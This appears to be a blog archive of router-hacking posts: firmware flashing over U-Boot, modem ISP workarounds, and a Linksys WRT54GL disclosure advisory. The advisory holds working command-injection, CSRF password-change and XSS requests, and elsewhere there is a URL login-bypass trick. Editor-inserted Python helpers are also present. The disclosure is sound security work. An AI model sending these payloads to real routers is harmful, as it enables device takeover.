Testing is finished and you can use the AVR JTAG to debug/program AVR microcontrollers. Here is how the AVR JTAG works: if you set JP1 to JTAG mode and power on the board, the AVR JTAG waits for a firmware upgrade until the Act LED goes off, and you can upgrade the firmware during this window. After the Act LED goes off the AVR JTAG is ready to use. If you set JP1 to ISP mode you should be able to program:

Bread board with AVR JTAG and ATMEGA32

May 23, 2020

AR9341 Router TTL Serial Flashing

Recently I got a batch of OEM PoE routers that have no USB interface, so I used them to study flashing over the TTL serial console.

Connect a USB-to-TTL adapter. Note that some boards are incompatible with some adapters and show garbled characters; try changing the baud rate, and if that doesn't help, switch to a different USB-to-TTL board.

On the computer I use SecureCRT with a serial port connection. Nothing appears on connecting; power on the router and the screen starts showing the U-Boot output. Press any key to interrupt (some boards interrupt on "tpl", others on Ctrl+C). I flash Breed first.

The software is provided for download below. Understand the flash commands before flashing:
2MB FLASH

Flash full firmware image:
tftp 0x80000000 full.bin
erase 0x9f000000 + 0x200000
cp.b 0x80000000 0x9f000000 0x200000
Flash uboot:
tftp 0x80000000 uboot.bin
erase 0x9f000000 + 0x20000
cp.b 0x80000000 0x9f000000 0x20000
Flash fw (the firmware filename is garbled in the source listing; use the name of your image on the TFTP server):
tftp 0x80000000 <firmware.bin>
erase 0x9f020000 + 0x1c0000
cp.b 0x80000000 0x9f020000 0x1c0000
Flash art:
tftp 0x80000000 art.bin
erase 0x9f1f0000 + 0x10000
cp.b 0x80000000 0x9f1f0000 0x10000


4MB FLASH

Flash full firmware image:
tftp 0x80000000 full.bin
erase 0x9f000000 + 0x400000
cp.b 0x80000000 0x9f000000 0x400000
Flash uboot:
tftp 0x80000000 uboot.bin
erase 0x9f000000 + 0x20000
cp.b 0x80000000 0x9f000000 0x20000
Flash fw (the firmware filename is garbled in the source listing; use the name of your image on the TFTP server):
tftp 0x80000000 <firmware.bin>
erase 0x9f020000 + 0x3c0000
cp.b 0x80000000 0x9f020000 0x3c0000
Flash art:
tftp 0x80000000 art.bin
erase 0x9f3f0000 + 0x10000
cp.b 0x80000000 0x9f3f0000 0x10000


8MB FLASH

Flash full firmware image:
tftp 0x80000000 full.bin
erase 0x9f000000 + 0x800000
cp.b 0x80000000 0x9f000000 0x800000
Flash uboot:
tftp 0x80000000 uboot.bin
erase 0x9f000000 + 0x20000
cp.b 0x80000000 0x9f000000 0x20000
Flash fw (the firmware filename is garbled in the source listing; use the name of your image on the TFTP server):
tftp 0x80000000 <firmware.bin>
erase 0x9f020000 + 0x7c0000
cp.b 0x80000000 0x9f020000 0x7c0000
Flash art:
tftp 0x80000000 art.bin
erase 0x9f7f0000 + 0x10000
cp.b 0x80000000 0x9f7f0000 0x10000


16M FLASH: flash addresses run from 0x000000 to 0x0FFFFFF;
over TTL (U-Boot) the flash is accessed at 0x9F000000 to 0x9FFFFFFF.
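Added example (not from the original post): a Python helper that derives the partition layout behind the commands above for the listed flash sizes, emits the tftp/erase/cp.b lines only when the image actually fits the target region, refuses to touch ART unless explicitly asked, and records a CRC32 and SHA-256 of the image so you can compare against what ends up in flash. The 16 MiB layout and the availability of U-Boot's crc32 command are assumptions; the post gives neither.

```python
import hashlib
import zlib

FLASH_BASE = 0x9F000000   # address at which the SPI flash is mapped (from the post's commands)
LOAD_ADDR = 0x80000000    # RAM address the post tftp's images to
UBOOT_SIZE = 0x20000      # first 128 KiB: U-Boot / Breed
ART_SIZE = 0x10000        # last 64 KiB: ART (radio calibration) data
RESERVED_SIZE = 0x10000   # 64 KiB between fw and art that the post's commands never touch
ERASE_BLOCK = 0x10000     # erase granularity all of the post's addresses are aligned to


def layout(flash_size):
    """Partition table {name: (absolute address, length)} for a given flash size.
    fw is sized so that uboot + fw + reserved + art fills the chip exactly, which reproduces
    the post's 0x1c0000 / 0x3c0000 / 0x7c0000 for 2 / 4 / 8 MiB (16 MiB is an assumption)."""
    fw_size = flash_size - UBOOT_SIZE - RESERVED_SIZE - ART_SIZE
    if flash_size % ERASE_BLOCK or fw_size < ERASE_BLOCK:
        raise ValueError("unsupported flash size 0x%x" % flash_size)
    return {
        "uboot": (FLASH_BASE, UBOOT_SIZE),
        "fw": (FLASH_BASE + UBOOT_SIZE, fw_size),
        "reserved": (FLASH_BASE + UBOOT_SIZE + fw_size, RESERVED_SIZE),
        "art": (FLASH_BASE + flash_size - ART_SIZE, ART_SIZE),
    }


def plan_flash(image, partition, flash_size, filename, allow_art=False):
    """Return the U-Boot command lines that write `image` into `partition`, refusing to
    produce anything that would spill past the partition or clobber ART by accident."""
    addr, length = layout(flash_size)[partition]
    if partition == "reserved":
        raise ValueError("the reserved region is not a flashing target")
    if partition == "art" and not allow_art:
        raise ValueError("art holds per-unit radio calibration; pass allow_art=True to overwrite it")
    if len(image) == 0 or len(image) > length:
        raise ValueError("image is %d bytes, partition %s holds %d" % (len(image), partition, length))
    return [
        "tftp 0x%08x %s" % (LOAD_ADDR, filename),
        "erase 0x%x + 0x%x" % (addr, length),
        # The post copies the whole partition length; copying only the image length avoids
        # writing whatever happens to be in RAM after the image into flash.
        "cp.b 0x%08x 0x%x 0x%x" % (LOAD_ADDR, addr, len(image)),
    ]


def image_fingerprint(image):
    """Values to record before flashing and compare afterwards: sha256 for your notes, crc32
    to match against U-Boot's `crc32 <addr> <len>` output (assumed present in the bootloader)."""
    return {"sha256": hashlib.sha256(image).hexdigest(),
            "crc32": "0x%08x" % (zlib.crc32(image) & 0xFFFFFFFF)}


if __name__ == "__main__":
    art_image = b"\xff" * ART_SIZE            # constructed stand-in for art.bin
    for line in plan_flash(art_image, "art", 0x200000, "art.bin", allow_art=True):
        print(line)
    print(image_fingerprint(art_image))
```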


Connect the network cable to a LAN port of the router. Configure the computer with IP 192.168.0.2, mask 255.255.255.0 and gateway 192.168.0.1.

Open the tftp program from my software package and select the network card connected to the router's cable; it should display the IP 192.168.0.2. Click "Show Dir"; it contains a firmware file breed-ar9341.bin. Flash it first by executing the following commands:

setenv ipaddr 192.168.0.1

setenv serverip 192.168.0.2

tftp 0x80000000 breed-ar9341.bin

When "done" appears, the transfer succeeded; then execute

erase 0x9f000000 + 0x20000

cp.b 0x80000000 0x9f000000 0x20000

When "done" appears, flashing succeeded. Unplug the router and plug it in again. SecureCRT displays the Breed boot and its "press any key" prompt, and you can see that the default LAN address is 192.168.1.1.

Point the computer's browser at 192.168.1.1 and you can use the Breed web interface directly.


Enter 192.168.0.1 in the address bar of the browser and select the firmware upgrade. Here you should first save the original firmware under Backup. You can configure OpenWrt after the flashing has completed.

Software download address:

https://pan.baidu.com/s/1Z7PkN8ROxpDITdRZHgw3nQ

Extraction code: be5m

    Dec 16, 2013

    myBRO To Globe : How-To Configure Green Packet DV-235T

    On my previous post I have written on How-To upgrade the myBRO DV-235T of Green Packet to the Stock Firmware. Today, I wanted to share to my beloved guest, commenters and visitors on How-To configure the Green Packet DV235T aka myBRO to be able to hook it to Globe network. This experiment is not an exploit or an ethical but only for Educational purposes only.


    The myBRO DV235T Green Packet 4G WiMAX wireless modem router that is built-in with WLAN b/g that you can find on forums, online store, is a Smart/PLDT WiMAX CPE with customized firmware supplied by Green Packet Berhad, Malaysia the manufacturer.

    Here's how to DIY, first you must have to update the myBRO DV-235T to the Green Packet stock firmware aka (web_update-2_3G-v2.10.14-g1.0.4-gp.tar), if you don't have the firmware, download it before you proceed to this guide. Once you have updated your myBRO to the stock firmware then you are now ready to do this stuff.


    In your myBRO DV235T graphical user interface (GUI) you will see the WiMAX menu at the top. In the left sub-menu click the Scanner button so you can edit/configure/enter the Globe 4G WiMAX ISP frequency; just follow the screenshot above.


    The next step is setting up the correct Username, Password and Identity. This is identical to what you would do for Authentication on a Huawei 4G WiMAX wireless modem router CPE, except that here the length of the Username field is limited to "maxlength=32", meaning that generatedmacaddress@globelines.com.ph cannot be entered in the space provided. The trick to extend the "maxlength=32": point your mouse at the field in the myBRO DV-235T GUI, right-click, and choose Inspect Element (Q); you can then edit maxlength=? to whatever value you wish, as you can see in the image grabbed above. Hopefully you will now be able to enter your 34-character generatedmacaddress@globelines.com.ph.


    There you are: your generatedmacaddress@globelines.com.ph is now in place! In the options below, just tick Auto Prepend Auto Mode and Ignore Cert Verification. By the way, don't forget to click the Apply button after every change you make, to save your work.

    Oops! We are not done yet. Open PuTTY or telnet and use the following commands so that your myBRO DV-235T can enter the Globe ISP network:

    enable                        (press Enter)
    router                        (press Enter)
    wan mac <your mac address>    (press Enter)
    commit                        (press Enter)
    exit                          (press Enter)
    reboot                        (press Enter)


    This proves that the myBRO DV-235T Green Packet 4G WiMAX wireless broadband modem router CPE can be used on the Globe ISP network. These tweaks can be found on Google, forums and other popular blogs. It is not my intention to alter or deform this device; since the stock firmware can be downloaded anywhere and is seeded on different mirror sites, don't flame me about this.

    Feel free to use this article for educational purposes; I give no guarantee or warranty that your device/CPE will not get bricked. Enjoy!

    Mar 14, 2013

    ZTE ZXDSL 931WII Firmware TFTP Upload


    Recently, I decided to upgrade my ADSL subscription to VDSL, and the deal included a ZTE ZXDSL 931WII CPE box (VDSL2 modem + NAT + WLAN AP). Attached with the box were instructions stating that configuration settings could be managed from a private web page provided by the ISP. And was one able to do so? Of course not. Much to my annoyance, it also turned out that all ‘outside the box’ local configuration had been disabled in the firmware (no response to LAN http, ssh or telnet). So, a quick call to the ISP helpdesk:
    “Hi! I upgraded to blablabla and would like to configure it but there’s nothing else on the remote admin panel than a save -button”

    “Ok let me check”

    “It doesn’t accept any http or telnet connections to the local admin interface either..”

    “What would you like to configure?”

    “Well you know, the usual stuff people configure on their home router; static IPs, port forwarding, admin password etc..”

    “Hmm well I can see that implementing the feature is pending, but I can check details about this with someone. Is it ok if I text you shortly? Kthxbye!” *CLICK*
    Some minutes later, there’s a text on my mobile saying “There is no known schedule for adding remote configurability for the current firmware at this time”. W-T-F and thanks a fucking bunch! :D

    Seriously: Do they think that I’m going to run this box in my home without having any access to feature configuration?

    Sure I can understand that, given the increasingly technical times we live in, the need might arise for the ISP to be able to remotely check the CPE configuration of some less-technically-inclined subscriber using their ACS server. But why-oh-why disable all local configuration options? Surely, the option of configuring the hardware could be kept available to those who wish to do so?

    Not happy with the situation at all, I decided it was time to take a look whether local configuration could be performed from inside the box.. I’d rather have a bit of my own fun with the box instead of paying xx€ for queuing +15 minutes on the phone just to be walked through a “Did you check cable connections” check list (or whatever). Should my “playtime” result with a bricked box, no problem. The ISP can then have the box back accompanied with a “the lights just went out” fault description and I’ll go buy something more decent :)

    After opening the enclosure, board gets the usual ‘scanning glance’.. and what do you know?! On the front edge close to the status LEDs there’s a standard 4-pole pin header. Easy guess; one pin for GND, one for +VDC, one for RS232TxD and one for RS232RxD. Sort of screaming “hello, I’m a serial port” all over. Not that it turned out to be exactly plug’n’.. err.. hack.

    As +3.3V logic levels are used, an RS232 line level driver is needed in between to interface with a standard serial port. I have plenty of Intersil HIN202 transceivers available, so that’s what I used and will discuss here. Any other RS232 transceiver (e.g. something by Maxim) should work as well. If you have some other chip, just pay attention to its datasheet / app notes for how to connect it.

    Basic application of HIN202. Image courtesy of Intersil.
    What I put together was rather directly lifted from the HIN202 datasheet (picture above). HIN202 actually uses +5V logic levels, but as the specced low/high signal transition thresholds are 0.8V / 2.0V (respectively), the chip works just fine with 3.3V signal levels too. What of course needs to be accounted for is the RxD output connecting to the CPU. Remember, that the transceiver outputs +5VDC high signal state whereas the CPU prefers 3.3V! Thus, a series resistor is needed to lower the signal level. My choice here was 10k.

    As you can see from the datasheet schematic above, electrolytic capacitors are used for the 10V on-chip voltage charge pumps. So why does my circuit use regular ceramic (1206 SMD) capacitors? Well, being the lazy me with certain things (like doing a quick hack such as this) is really about what suitable is ‘on the desk’.. and here, it was the ceramic capacitors. I have no idea if the electrolytics allow the pumps to work better in some specific conditions, but at least on my desktop/living room setup the RS232 connection works just fine like this. So, leave it at that and move on.

    Lower side connections of the RS232 transceiver
    Upper side connections of the RS232 transceiver
    The completed adapter
    The transceiver needs +5VDC operating voltage. Luckily there’s a +5V switch mode regulator stage on-board, so there’s no need to build a separate one just for the transceiver alone. I chose to tap into the supply by connecting parallel to D3, but there are plenty of other places on-board too.

    Connected to the +5VDC supply..

    Ok, adapter all wired up.. Hook it up with the PC, open a port connection in HyperTerm using 115k 8-n-1 and yay, bootup texts scrolling on the screen \o/.

    In case you’re wondering about the enclosure looking different on the picture above than what it is at the ZTE website (and the beginning of this post) .. It’s because it is! :) Apparently, ZTE offers at least these two types of enclosure, allowing for a little bit of ISP “branding flair” or whatever. The manuals shipped with the unit have pictures of both enclosures and with a ZTE logo on it, whereas the box itself carries the ISP logo. How classy.

    Hardware-wise, the box has a BCM6368 400 MHz processor, 4Mb flash and 64Mb DRAM. For WiFi, there’s a BCM4138 chip. I didn’t really want to bother with removing the RF shielding around the processor to see what else there might be underneath. The ground layer on the bottom of the board is pretty big, so the board and the shielding plate would have to be heated to extremes for removal.

    Considering embedded systems as a whole.. Whereas hardware I can manage, Linux I however don’t. I do have some experience with distro installations (Debian, Ubuntu etc.) and basic command line usage, but this doesn’t really get you anywhere on an embedded system that’s optimized for a specific use. So, as you can probably imagine, ending up on the command prompt of the 931WII was somewhat of a baffling moment. Steep learning curve right up ahead and all that.. :)

    Luckily, hints given by friends combined with a plethora of internet searches pointed me the way. After fiddling around a while, I had a tftp server (TFTPD32) running on my laptop and was able to transfer the flash config to and from the box. The kernel is configured to automatically reboot the system after a valid config file has been uploaded, so no additional command line trickery is required for applying the new settings.

    The settings themselves use some Broadcom xml markup (tags starting with X_BROADCOM_COM). I’m sure some kind of developer documentation must exist, though I was unable to find anything in Broadcom’s online resource library. But once again, searching the net for some of the markup tags gave ideas on how to go about configuring some of the settings. First tweak (of course), remove everything between the ManagementServer -tags ;).

    After having my share of fun playing “the master of the system”, the first problem surfaced. No matter what parameter switches I passed to tftp, transferring the entire firmware didn’t seem to be possible. The system just kept persistently dumping/fetching the flash config! So there I was, trying to figure out what’s wrong with my tftp setup.. right about until a friend suggested that I could try starting the shell! Being used to desktop systems, I assumed shell would be running (BusyBox is mentioned on the startup texts, and all) but it actually wasn’t. No wonder the basic file system commands (like ‘cd’) were missing :D

    If only someone had mentioned earlier that I'm supposed to do this.. ;)
    So, after launching the BusyBox shell suddenly tftp has no problems transferring the firmware binary. No idea why it is like this (or did I do/type sth wrong?) but “yeah whatever”, as long as tftp is fully functional. The ZTE firmware binary I uploaded is of version 1.5.0c and it contains CFE bootloader and some vmlinux (2.6.21.5 kernel). The binary is available at the ZTE Finland website along with 1.5.0b. Both of these are for ISP other than mine, but they seem to work. There is 1.5.3something available here, but my box doesn’t accept this. ZTE doesn’t (at least currently) share firmware binaries with end-users, so I have no idea how much newer versions there might be.

    Despite now having both the telnet and http admin interfaces accessible, what remains to be figured out is why certain ethernet connections time out too quickly with the current firmware. This doesn’t seem to happen when using WLAN, so the problem is definitely somewhere in the LAN router settings. I tried modifying some of the nf_conntrack TCP values found under /proc/sys/net/ipv4/netfilter/, to no avail. Not that it looks like the IP table is getting full either (as in, packets dropped). More learning curve for yours truly, so to say..

    Big thanks to everyone who had enough patience to help me with Linux, its networking features and other related stuff! If you happen to read this and have a pdf on the Broadcom XML, I wouldn’t mind a download link in the mail. Most of the stuff in the config file seems to be accessible through the http admin interface anyway, so it’s not like my need for the documentation is critical. Call it more of a “nice-to-have” bonus ;)

    The factual content ends here, but just to continue a bit on bonuses this is the “real one” of the topic..:

    Only after I had the box running on the downgraded firmware, I came across some forum posts stating that the stock firmware is accessible by using the public WAN IP.. Grrrrrr, motherfuckers! If it is so, why the fuck DIDN’T HELPDESK OR THE MANUAL MENTION ABOUT THIS?

    More importantly, if it is so, this also sounds like a security risk of sorts. Basically, all you’d have to know is the public IP of some subscriber using this particular CPE (f.ex. take a look at the ISP forum where they conveniently log user IPs), and you’d gain access to their router configuration in no time thanks to the very “default” admin password. Classy *2, if so.

    Then again, a friend in-the-know tells me that some ISPs have certain modems that’ll give you access to the admin interface from the WAN side if you simply change "login.html?success=0" to "login.html?success=1" on the browser address line! So yeah, maybe things could also be worse.. ;)

    Jan 21, 2013

    Linksys WRT54GL 1.1 XSS OS Injection


    Device Name: Linksys WRT54GL v1.1
    Vendor: Linksys/Cisco

    ============ Vulnerable Firmware Releases: ============

    Firmware Version: 4.30.15 build 2, 01/20/2011

    ============ Device Description: ============

    The Router lets you access the Internet via a wireless connection, broadcast at up to 54 Mbps, or through one of its four switched ports. You can also use the Router to share resources such as computers, printers and files. A variety of security features help to protect your data and your privacy while online. Security features include WPA2 security, a Stateful Packet Inspection (SPI) firewall and NAT technology. Configuring the Router is easy using the provided browser-based utility.

    Source: http://homesupport.cisco.com/en-us/support/routers/WRT54GL

    ============ Shodan Dorks ============

    Shodan Search: WRT54GL
    => Results 27190 devices

    ============ Vulnerability Overview: ============

    * OS Command Injection
    => parameter: wan_hostname
    => command: `%20ping%20192%2e168%2e178%2e101%20`

    The vulnerability is caused by missing input validation in the wan_hostname parameter and can be exploited to inject and execute arbitrary shell commands. With wget it is possible to upload and execute a backdoor to compromise the device.
    You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

    Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/OS-Command-Injection-param_wan_hostname.png

    POST /apply.cgi HTTP/1.1
    Host: 192.168.178.166
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Proxy-Connection: keep-alive
    Referer: http://192.168.178.166/index.asp
    Authorization: Basic xxxxx
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 734
    Connection: close

    submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

    => Changing the request method from HTTP POST to HTTP GET makes the exploitation easier:

    http://192.168.178.166/apply.cgi?submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

    => This setting is stored permanently in the configuration, so it gets executed on every boot of the device.

    * Changing the current password does not require the current password

    With this vulnerability an attacker is able to change the password without knowing the current one. The attacker needs access to an authenticated browser.


    POST /apply.cgi HTTP/1.1
    Host: 192.168.178.166
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Proxy-Connection: keep-alive
    Referer: http://192.168.178.166/Management.asp
    Authorization: Basic YWRtaW46YWRtaW4=
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 299

    submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd&http_passwdConfirm=pwnd&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

    * CSRF for changing the password without knowing the current one; the attacker is also able to activate remote management:

    http:///apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd1&http_passwdConfirm=pwnd1&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

    * reflected XSS

    => parameter: submit_button

    Injecting scripts into the parameter submit_button reveals that this parameter is not properly validated for malicious input.

    Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/reflected-XSS-01.png

    POST /apply.cgi HTTP/1.1
    Host: 192.168.178.166
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Proxy-Connection: keep-alive
    Referer: http://192.168.178.166/Wireless_Basic.asp
    Authorization: Basic xxxx=
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 155

    submit_button=Wireless_Basic'%3balert('pwnd')//&action=Apply&submit_type=&change_action=&next_page=&wl_net_mode=mixed&wl_ssid=test&wl_channel=6&wl_closed=0

    * stored XSS (Access Restrictions -> "Richtliniennamen eingeben" [enter policy name] (place the XSS) -> "Zusammenfassung" [summary] (script code gets executed))

    => parameter: f_name

    Injecting scripts into the parameter f_name reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods like CSRF for inserting the malicious JavaScript code.

    Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/stored-XSS-Filters.png

    => Changing the request method from HTTP POST to HTTP GET makes the exploitation easier:


    http://192.168.178.166/apply.cgi?submit_button=Filters&change_action=&submit_type=save&action=Apply&blocked_service=&filter_web=&filter_policy=&f_status=0&f_id=1&f_status1=disable&f_name=123">&f_status2=allow&day_all=1&time_all=1&allday=&blocked_service0=None&blocked_service1=None&host0=&host1=&host2=&host3=&url0=&url1=&url2=&url3=&url4=&url5=
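Added example (not part of the advisory): a small Python checker that decodes apply.cgi requests, applies the hostname allow-list the firmware should have enforced on wan_hostname, and flags the submit_button/f_name script injections and the password change with remote_management=1 described above, run over constructed access-log lines whose query strings follow the advisory's requests.

```python
import re
from urllib.parse import urlsplit, parse_qs

# RFC 1123 label: letters, digits and hyphens, 1-63 chars, no leading/trailing hyphen.
# This allow-list is what the firmware should enforce before wan_hostname reaches
# a shell; anything else is rejected rather than escaped.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")
_SHELL_META = re.compile(r"[`$;|&<>\r\n()]")   # characters a shell would interpret
_HTML_META = re.compile(r"[<>\"']")             # enough to break out of an attribute
_SUBMIT_OK = re.compile(r"^[A-Za-z0-9_]*$")     # legit values: index, Management, Filters ...
_LOG = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/1\.[01]"')


def is_valid_hostname(value):
    """True if value is a syntactically valid hostname (RFC 1123 labels)."""
    if not value or len(value) > 253:
        return False
    return all(_LABEL.match(label) for label in value.split("."))


def apply_cgi_params(target, body=""):
    """Decode the parameters of an apply.cgi request (GET query and/or POST body).

    Returns None for any other path. Percent-encoding (%20, %2e, %3b ...) is
    decoded, so the check sees what the CGI handler sees.
    """
    parts = urlsplit(target)
    if not parts.path.endswith("/apply.cgi"):
        return None
    merged = parse_qs(parts.query, keep_blank_values=True)
    merged.update(parse_qs(body, keep_blank_values=True))
    return {k: v[0] for k, v in merged.items()}


def inspect(target, body=""):
    """Return a list of (finding, parameter) pairs for one apply.cgi request."""
    p = apply_cgi_params(target, body)
    if p is None:
        return []
    found = []
    host = p.get("wan_hostname")
    if host is not None and not is_valid_hostname(host):
        kind = "os-command-injection" if _SHELL_META.search(host) else "bad-hostname"
        found.append((kind, "wan_hostname"))
    if not _SUBMIT_OK.match(p.get("submit_button", "")):
        found.append(("reflected-xss", "submit_button"))
    if _HTML_META.search(p.get("f_name", "")):
        found.append(("stored-xss", "f_name"))
    if p.get("PasswdModify") == "1" and "http_passwd" in p:
        kind = "password-change"
        if p.get("remote_management") == "1":
            kind += "+remote-mgmt-enabled"   # admin UI exposed on http_wanport
        found.append((kind, "http_passwd"))
    return found


def scan_log(lines):
    """Run inspect() over access-log style lines; returns {line_no: findings}."""
    hits = {}
    for n, line in enumerate(lines, 1):
        m = _LOG.search(line)
        if m:
            findings = inspect(m.group("target"))
            if findings:
                hits[n] = findings
    return hits


# Constructed sample log lines; the query strings follow the advisory's requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jan/2013:10:00:00 +0100] "GET /index.asp HTTP/1.1" 200 512',
    '10.0.0.5 - - [18/Jan/2013:10:00:05 +0100] "GET /apply.cgi?submit_button=index'
    '&action=Apply&router_name=test&wan_hostname=test HTTP/1.1" 200 100',
    '10.0.0.5 - - [18/Jan/2013:10:00:09 +0100] "GET /apply.cgi?submit_button=index'
    '&action=Apply&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20` HTTP/1.1" 200 100',
    '10.0.0.5 - - [18/Jan/2013:10:00:12 +0100] "GET /apply.cgi?submit_button='
    "Wireless_Basic'%3balert('pwnd')//&action=Apply HTTP/1.1\" 200 100",
    '10.0.0.5 - - [18/Jan/2013:10:00:20 +0100] "GET /apply.cgi?submit_button=Filters'
    '&f_name=123%22%3E&action=Apply HTTP/1.1" 200 100',
    '10.0.0.5 - - [18/Jan/2013:10:00:30 +0100] "GET /apply.cgi?submit_button=Management'
    '&PasswdModify=1&http_passwd=x&http_passwdConfirm=x&remote_management=1'
    '&http_wanport=8080 HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for n, findings in sorted(scan_log(SAMPLE_LOG).items()):
        print(f"line {n}: {findings}")
```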

    ============ Solution ============

    Upgrade your router to the latest firmware version with fixes for XSS and OS Command Injection vulnerabilities.

    Fixed Version: Ver.4.30.16 (Build 2)
    Available since 10.01.2013

    Download: http://homesupport.cisco.com/en-eu/support/routers/WRT54GL

    ============ Credits ============

    The vulnerability was discovered by Michael Messner
    Mail: devnull#at#s3cur1ty#dot#de
    Web: http://www.s3cur1ty.de
    Advisory URL: http://www.s3cur1ty.de/m1adv2013-001
    Twitter: @s3cur1ty_de

    ============ Time Line: ============

    September 2012 - discovered vulnerability
    03.10.2012 - Contacted Linksys and gave them detailed vulnerability information
    03.10.2012 - Linksys responded with a case number
    11.10.2012 - Status update from Linksys
    23.10.2012 - Linksys requested to sign the Beta Agreement for testing the Beta Firmware
    29.10.2012 - Sent the Beta Agreement back
    29.10.2012 - Linksys gave access to the new Beta Firmware
    30.10.2012 - Checked the new firmware and verified that the discovered XSS and OS Command Injection vulnerabilities are fixed
    30.10.2012 - Linksys responded that there is no ETA of the new firmware
    17.01.2013 - Linksys informed me about the public release of the mostly fixed version (XSS, OS Command Injection fixed)
    18.01.2013 - public release
    ===================== Advisory end =====================



    Mar 21, 2013

    Tomato Firmware DualWAN Support Routers List

    Tomato DualWAN is known to support the following wireless router devices.


    Note: if the "VLAN support" column is Yes, the device's WAN2 can be connected to a wired or a wireless network, WAN2 being the LAN port next to the original WAN port; if the column is No, WAN2 can only be connected to a wireless network.

    Flashing the non-ND version: device list

    Model                | Hardware version                   | VLAN support | Firmware file name | Remark
    Linksys WRT54GS      | 1.0, 2.0                           | Yes          | WRT54GS.bin        |
    Linksys WRT54GS      | 1.1                                | Yes          | WRT54GS.bin        | See reply #21 in the thread: a user reported that the WRT54GS V1.1 supports VLAN
    Linksys WRT54GS      | 2.1                                | Yes          | WRT54GS.bin        | Thanks to dosar for the information
    Linksys WRT54GS      | 3.0, 4.0                           | Yes          | WRT54GSv4.bin      |
    Linksys WRT54G       | 1.1, 2.0, 2.1, 2.2, 3.0, 3.1, 4.0  | Yes          | WRT54G_WRT54GL.bin |
    Linksys WRT54GL      | 1.1                                | Yes          | WRT54G_WRT54GL.bin | Thanks to snyean for the information
    Moto 850G            | V2, V3                             | Yes          | WR850G.bin         |
    Belkin 7231-4P       |                                    | Yes          | Tomato.trx         |
    DELL TrueMobile 2300 | V2                                 | Yes          | Tomato.trx         |
    Buffalo WHR-HP-G54   |                                    | Yes          | Tomato.trx         | WAN2 is the LAN1 port, the one away from the WAN port
    Buffalo WVR-G54-NF   |                                    | Yes          | Tomato.trx         |
    Asus WL-300G         | V1.91                              | Yes          | Tomato.trx         | The WL-300G has only one LAN port, so this is experimental only and of no practical value

    Flashing the ND version: device list

    Model                  | Hardware version             | VLAN support | K24 firmware     | K26 firmware (R1/R2)                                        | Remark
    DualWAN WR-500U        | R1.1                         | Yes          | Tomato-ND.trx    | Flash the R1 build or the special edition                   | After flashing the special edition: supports dual dial-up on one line, trunking and port mirroring
    DualWAN WR-500V        |                              | Yes          | Does not support | Special edition                                             | After flashing the special edition: supports dual dial-up on one line, trunking and port mirroring
